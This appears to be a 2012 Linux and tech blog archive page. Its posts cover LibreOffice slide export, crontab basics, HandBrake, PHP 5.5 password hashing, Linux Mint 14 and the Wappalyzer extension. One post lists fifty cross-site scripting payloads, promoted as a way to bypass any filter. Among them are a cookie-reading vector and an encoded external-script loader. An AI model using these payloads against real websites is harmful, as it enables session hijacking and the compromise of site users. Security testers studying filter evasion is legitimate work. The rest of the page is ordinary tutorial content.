Wednesday, 28 November 2012

How To Export LibreOffice Impress Slides As Images

I was trying to export individual slides from LibreOffice Impress but I had to select each of the slide and then export it which was getting really really irritating with larger slides. With a quick search, I found an Impress extension that lets you export all the slides at once.

So the addon I was talking about is Export as Images extension which lets you export all the Impress slides or Draw pages into different image formats. The formats supported are JPG, PNG, GIF, BMP and TIFF format.

Once you install the extension, it adds a menu entry "Export as images..." to File menu and allows you to choose a file name for exported images, image size as well as some other parameters.

Installing Export as Images extension


First grab the extension from HERE or see if newer version is available from HERE.



Once you have downloaded the extension, the installation is pretty straightforward. Open up the Extension Manager from Tools menu and then click on Add. Now navigate to the folder containing your newly downloaded extension and select it. Once the installation succeeds, make sure to restart your LibreOffice Impress to make sure the extension gets activated.

Now open any presentation and to export all the slides as images, go to Files menu where you'll find a new entry Export as images... just below the Export... option.



The GUI for the extension is self explanatory. I hope this proves useful to you :)


Read more...

Tuesday, 27 November 2012

Basic Guide To Crontab

Well it has been a busy week and now I am back with this basic guide to running cron jobs in linux.

Cron is a time-based job scheduling program which comes shipped with most linux distributions and enables users to execute commands or set of scripts automatically at the specified time. Cron is particularly important for system administration and maintenance though it can be used for any general purpose such as scheduling your porn downloads. My post is based on the Vixie Cron, a popular implementation of Cron by Paul Vixie which is by default the cron program in Ubuntu. Other implementations of the cron are anacron, fcron, and dcron.

The cron daemon runs automatically during the startup and consults the crontabs (shorthand for cron tables) for jobs to executed. Crontabs are nothing but files containing the commands to be run at the specified time, however there is a particular (& simple to remember) syntax for cronjobs to be run. You could directly edit these cron tables files but that's not the recommended way. You should always use the crontab editor to add/update jobs to the crontabs.

Cron searches its spool area (located at /var/spool/cron/crontabs) for crontab files which are named after the user accounts from /etc/passwd. As a matter of precaution, you should not directly manipulate the files in there. Additionally, cron reads the /etc/crontab file and all the files in /etc/cron.d. Also, there are other folders: /etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, and /etc/cron.weekly. And, the name of folders are obvious so if you put the scripts in one of these folders, your script will run either daily or hourly or monthly or weekly.

Since you got several files associated with cron, you have bunch of options on running the cron jobs in your system. First lets start with the crontab tool which is used to install, deinstall or list the tables used to drive the cron daemon. If the /etc/cron.allow file exists, then you must be listed (one user per line) therein in order to be allowed to use this command. If the /etc/cron.allow file does not exist but the /etc/cron.deny file does exist, then you must not be listed in the /etc/cron.deny file in order to use this command.

The crontab command provides following options:
        -e edit user's crontab
 -l list user's crontab
 -r delete user's crontab
 -i prompt before deleting user's crontab


crontab can be configured to use any of the editors.

To list the user's crontab, use the following command:

$ crontab -l


To delete existing cron table, type:

$ crontab -ir


To install new cron table, type:

$ crontab -e


If you are wishing to add commands that require root privilege for execution, make sure you prepend sudo in the above command to add such commands to crontabs. The cron table expects each line of cron job in the following format:

m h dom mon dow command
i.e.
minute hour day_of_month month day_of_week command_to_run


These columns take the values in the range below:

  Minute (0 - 59)
  Hour (0 - 23)
  Day of month (1 - 31)
  Month (1 - 12)
  Day of the week (0 - 6, 0 representing sunday, 6 saturday)



Apart from these values, the cron entries accept other special characters. In each of these five columns:

  • An asterisk (*) stands for "every".
  • Slashes (/) are used to describe increments of ranges eg. */15 in minutes column would execute the specified command regularly and repeatedly after 15 minute.
  • Commas (,) are used to separate items of a list. eg. using 1,2,3 in the 5th field (day of week) would mean Mondays, Tuesday, and Wednesday.
  • Hyphens (-) are used to define ranges. For example, 2-5 in the 5th field would indicate Tuesday to Friday.


Now we know the format of how should each line of cron entry should look like, lets see some examples.

Run backup at 5 a.m every Monday

0 5 * * 1 /bin/mybackup


Run backup at 12:01 a.m monday-thursday

1 0 * * 1-4 /bin/mybackup


Run backup at 12:01 a.m on monday and thursday

1 0 * * 1,4 /bin/mybackup


Run backup every minute

* * * * * /bin/mybackup


Run backup every 15 minutes repeatedly

*/15 * * * * /bin/mybackup


The information below is taken directly from man 5 crontab and can serve as a good reference for special strings in place of the 5 columns:
              @reboot        Run once, at startup.
              @yearly        Run once a year, "0 0 1 1 *".
              @annually      (same as @yearly)
              @monthly       Run once a month, "0 0 1 * *".
              @weekly        Run once a week, "0 0 * * 0".
              @daily         Run once a day, "0 0 * * *".
              @midnight      (same as @daily)
              @hourly        Run once an hour, "0 * * * *".


Now that you are feeling better with cronjobs, we will see how we can add cronjobs in the /etc/crontab file. The different thing about this crontab file is that there is an extra column for user field so that the particular cron entry is executed as the specified user.

The format for cron entry is similar to what we've seen already, with an extra column for user.

m h dom mon dow user command


You can use any text editor such as nano or vi to edit the /etc/crontab file.

Finally, once you update crons, make sure to restart the cron daemon to ensure your new cron entries get read by the daemon.

$ sudo service cron restart


I hope this primer for crontab helps you in your job scheduling job :D


Read more...

Friday, 23 November 2012

Video Transcoding With HandBrake In Linux

HandBrake is a GPL-licensed, multiplatform, multithreaded video transcoder available for major platforms: linux, mac, and windows. HandBrake converts video from nearly any format to a handful of modern ones.



Handbrake can save output in two containers, MP4 and MKV and I've been using it as a MKV transcoder for a while and I'm quite satisfied with it. Even though the official wiki says its not a ripper, I can see it to be quite useful DVD ripper.



Handbrake is available in CLI (HandBrakeCLI) and GUI (ghb) mode. Hence this offers the flexibility to choose the appropriate version according to your linux personality. As of now, we can install HandBrake from PPA and the latest version is v. 0.9.8 released back in July this year.

HandBrake can be installed from PPA. Issue the following commands in your terminal

$ sudo add-apt-repository ppa:stebbins/handbrake-releases
$ sudo apt-get update
$ sudo apt-get install handbrake-cli


Or if you wish to install the GUI version, type:

$ sudo apt-get install handbrake-gtk




I recommend using the CLI version since you can transcode/convert videos much more efficiently if you use the CLI version. But if you are not comfortable with the command line interfaces, the GUI version of HandBrake is also quite good.



Only problem I have felt is the naming convention of the commands for both the GUI and CLI versions of the tool. In order to run two versions of this tool, you need to type HandBrakeCLI for CLI version and ghb for the GUI version. The problem here is with the naming convention for the binaries. I mean, the names handbrake-cli and handbrake-gtk would be more straightforward than these badly chosen names. Otherwise, the tool does pretty good job of video conversion and can be good alternative if you are not comfortable with ffmpeg. Note that ffmpeg is also capable of video conversions of different formats and is a great tool. :)


Read more...

Monday, 19 November 2012

50 Awesome XSS Vectors From @soaj1664ashar

Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.

50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)

1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 
2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 
4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
7) <var onmouseover="prompt(1)">On Mouse Over</var>
 
8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 
9) <img src="/" =_=" title="onerror='prompt(1)'">
 
10) <%<!--'%><script>alert(1);</script -->
 
11) <script src="data:text/javascript,alert(1)"></script>
 
12) <iframe/src \/\/onload = prompt(1)
 
13) <iframe/onreadystatechange=alert(1)
 
14) <svg/onload=alert(1)
 
15) <input value=<><iframe/src=javascript:confirm(1)
 
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
 
17) http://www.<script>alert(1)</script .com
 
 
18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 
19) <svg><script ?>alert(1)
 
20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 
21) <img src=`xx:xx`onerror=alert(1)>
 
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
 
23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 
26) <svg contentScriptType=text/vbs><script>MsgBox+1
 
27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 
30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 
31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
 
32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
 
33) <script>+-+-1-+-+alert(1)</script>
 
34) <body/onload=&lt;!--&gt;&#10alert(1)>
 
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
 
36) <img src ?itworksonchrome?\/onerror = alert(1)
 
37) <svg><script>//&NewLine;confirm(1);</script </svg>
 
38) <svg><script onlypossibleinopera:-)> alert(1)
 
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
 
40) <script x> alert(1) </script 1=2
 
41) <div/onmouseover='alert(1)'> style="x:">
 
42)  <--`<img/src=` onerror=alert(1)> --!>
 
43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
 
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
 
45) "><img src=x onerror=window.open('https://www.google.com/');>
 
46) <form><button formaction=javascript&colon;alert(1)>CLICKME
 
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
 
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
 
50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>


Or Grab from pastebin :)


Read more...

PHP 5.5 To Include Simple And Secure Password Hashing API

Few days ago, we saw the release of PHP 5.5.0 Alpha 1 to the public. The PHP development team is serious about addressing all the criticism it gets time and again. With the recent leaks of several high profile sites, a simple to use yet secure password hashing API has been introduced now.

Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.

In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.



Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.

Using the API is quite simple. All you have to do to get the hash is:

$hash = password_hash($password, PASSWORD_BCRYPT);


Verifying the password is also quite simple.

if (password_verify($password, $hash)) {
    // pass is correct :)
} else {
    // pass is correct :/
}


The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.

Reading materials



RFC for simple password hashing API

Designing an API

PHP 5.5.0 Alpha 1 released


Read more...

How To View Someone's IP and Speed - Epic

Well wanna laugh the whole day? Then, check out the video I found today on google. Don't even try to hold your laugh while watching this video because that's gonna cause a serious mental disorder :P. Before starting, I would suggest you to read Wikipedia entry about traceroute if you don't know about traceroute(Believe me if you understand english, you'll get what it is).





Myself, been laughing the whole day. :P


Read more...

Tuesday, 13 November 2012

Linux Mint 14 "Nadia" RC Released

After 6 months of incremental development on top of stable and reliable technologies such as MATE, Cinnamon and MDM, Linux Mint 14 codenamed "Nadia" RC is available for download.



For the first time since Linux Mint 11, the development team was able to capitalize on upstream technology which works and fits its goals. After 6 months of incremental development, Linux Mint 14 features an impressive list of improvements, increased stability and a refined desktop experience. This new release comes with updated software and brings refinements and new features to make your desktop even more comfortable to use. Linux Mint 14 "Nadia" is based upon the Ubuntu 12.10 "Quantal Quetzal".



The download links (torrents and direct both) are available at this blog post.

Useful Links

Download Nadia
Nadia release notes
Whats New in Nadia


Read more...

Sunday, 11 November 2012

Wappalyzer - Browser Extension To Identify Web Servers

Wappalyzer is a very useful browser extension that reveals the web technologies and server softwares used behind to empower any webpage. This extension identifies different CMS, e-commerce portals, blogging platforms, web servers, frameworks, analytic tools, etc.

This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.

Wappalyzer for Mozilla Firefox

Wappalyzer for Google Chrome

Wappalyzer @ GitHub



Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of address bar (near to the bookmark & reload icon) in Mozilla Firefox. You can click in that area for more details.

One particular setting you would like to disable is the tracking and gathering of anonymous data which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.




Read more...